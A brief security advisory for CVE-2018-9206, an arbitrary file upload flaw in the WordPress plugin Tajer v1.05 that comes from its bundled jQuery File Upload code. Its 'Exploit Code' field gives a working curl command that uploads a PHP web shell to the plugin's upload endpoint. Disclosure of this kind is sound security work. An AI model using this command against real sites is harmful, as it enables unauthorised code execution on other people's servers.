| Title: Arbitrary file upload vulnerabiity in WordPress Plugin tajer v1.05 |
| Author: Larry W. Cashdollar, @_larry0 |
| Date: 2018-10-15 |
| CVE IDs:[CVE-2018-9206] |
| Download Site: https://wordpress.org/plugins/tajer |
| Vendor: |
| Vendor Notified: 0000-00-00 |
| Vendor Contact: |
| Advisory: http://www.vapidlabs.com/advisory.php?v=205 |
| Description: Tajer – All In One eCommerce WordPress Premium Class Plugin. You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products. |
| Vulnerability: This plugin has components of Blueimp's jQuery file upload that is vulnerable to arbitrary file upload and code execution. |
| Export: JSON TEXT XML |
| Exploit Code: curl -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php |
| Screen Shots: |
| Notes: |